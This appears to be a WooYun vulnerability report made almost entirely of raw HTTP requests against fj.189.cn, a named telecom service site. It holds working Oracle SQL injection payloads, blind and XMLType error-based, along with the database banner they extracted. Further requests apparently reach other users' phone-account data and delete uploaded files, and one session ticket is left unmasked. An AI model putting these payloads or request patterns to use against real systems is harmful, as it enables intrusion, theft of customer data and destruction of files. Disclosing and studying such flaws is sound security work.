WooYun.org

and
 or
select

POST /ServiceOrderAjax.do HTTP/1.1
Origin: http://fj.189.cn
Content-Length: 181
Accept-Language: zh-CN,zh;q=0.8
Accept-Encoding: gzip,deflate
Host: fj.189.cn
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close
X-Requested-With: XMLHttpRequest
Pragma: no-cache
Cache-Control: no-cache
Referer: http://fj.189.cn/service/transaction_new/lan/queryResources.jsp
Content-Type: application/x-www-form-urlencoded
Cookie: 
method=queryAddrByNameInPage&PARENTADDRID=1058224&AREACODE=591&ADDRNAME='/**/AND ascii(substr((select/**/user from dual),1,1)) between 81/**/and 85/**/AND '%'='&FROMCODE=1&ENDCODE=2

POST /ServiceOrderAjax.do HTTP/1.1
Origin: http://fj.189.cn
Content-Length: 245
Accept-Language: zh-CN,zh;q=0.8
Accept-Encoding: gzip,deflate
Host: fj.189.cn
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close
X-Requested-With: XMLHttpRequest
Pragma: no-cache
Cache-Control: no-cache
Referer: http://fj.189.cn/service/transaction_new/lan/queryResources.jsp
Content-Type: application/x-www-form-urlencoded
Cookie: 
method=queryAddrByNameInPage&PARENTADDRID=1058224&AREACODE=591&ADDRNAME='/**/AND 1=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||(utl_raw.cast_to_raw((SELECT/**/banner from v$version where rownum=1))))) FROM DUAL)/**/AND '%'='&FROMCODE=1&ENDCODE=30

得到
4F7261636C652044617461626173652031306720456E74657270726973652045646974696F6E2052656C656173652031302E322E302E332E30202D2036346269
解码后为
Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 - 64bi
(不知道为什么少了一个t，求指导)

'/**/AND 1=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||((SELECT/**/user from dual where rownum=1)))) FROM DUAL)/**/AND '%'='

POST /ServiceOrderAjax.do HTTP/1.1
Host: fj.189.cn
Proxy-Connection: keep-alive
Content-Length: 61
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://fj.189.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE
Content-Type: application/x-www-form-urlencoded
Referer: http://fj.189.cn/service/transaction_new/tianyiself/prodrevision/zyyw.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: isLogin=logined; fj_citycode=0591; ticket=***此处应打码***; 
method=setEsuringIn&number=18065917777&phonetype=50&city=0591

POST /service2/actions/Package.action?showPackageAttr= HTTP/1.1
Host: fj.189.cn
Proxy-Connection: keep-alive
Content-Length: 35
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://fj.189.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE
Content-Type: application/x-www-form-urlencoded
Referer: http://fj.189.cn/service/transaction_new/tianyiself/prodrevision/zyyw.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: isLogin=logined; fj_citycode=0591; ticket=ticket=***此处应打码***; 
OBJECTNUM=18065917777&OBJECTTYPE=50

POST /service2/actions/Package.action?showPackageAttr= HTTP/1.1
Host: fj.189.cn
Proxy-Connection: keep-alive
Content-Length: 31
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://fj.189.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE
Content-Type: application/x-www-form-urlencoded
Referer: http://fj.189.cn/service/transaction_new/tianyiself/prodrevision/zyyw.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ticket=***此处应有打码***; 
OBJECTNUM=26999999&OBJECTTYPE=1

POST /ServiceOrderAjax.do HTTP/1.1
Host: fj.189.cn
Proxy-Connection: keep-alive
Content-Length: 116
Accept: */*
Origin: http://fj.189.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE
Content-Type: application/x-www-form-urlencoded
Referer: http://fj.189.cn/service/transaction_new/phone/telephone_add.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ticket=0wv77gFD21inaa0mqaHr;
method=delfile&saveFileName=1438937023523.jpg&saveFilePath=%2Fservice%2Ftransaction_new%2Flan%2Fuploadfile%2Ffile%2F